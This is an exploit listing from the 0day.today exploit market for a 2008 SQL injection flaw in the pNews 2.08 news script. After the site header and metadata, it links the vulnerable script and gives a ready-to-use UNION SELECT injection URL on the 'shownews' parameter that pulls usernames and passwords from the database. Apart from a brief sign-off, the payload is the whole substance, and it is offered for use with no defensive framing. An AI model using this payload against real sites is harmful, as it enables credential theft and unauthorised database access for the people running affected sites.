[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

pNews 2.08 (shownews) Remote SQL Injection Vulnerability

Author
Cr@zy_King
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3141
Category
web applications
Date add
08-06-2008
Platform
unsorted
========================================================
pNews 2.08 (shownews) Remote SQL Injection Vulnerability
========================================================



Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=

http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*

Greatz : aLL My Friends :P 




#  0day.today [2024-12-24]  #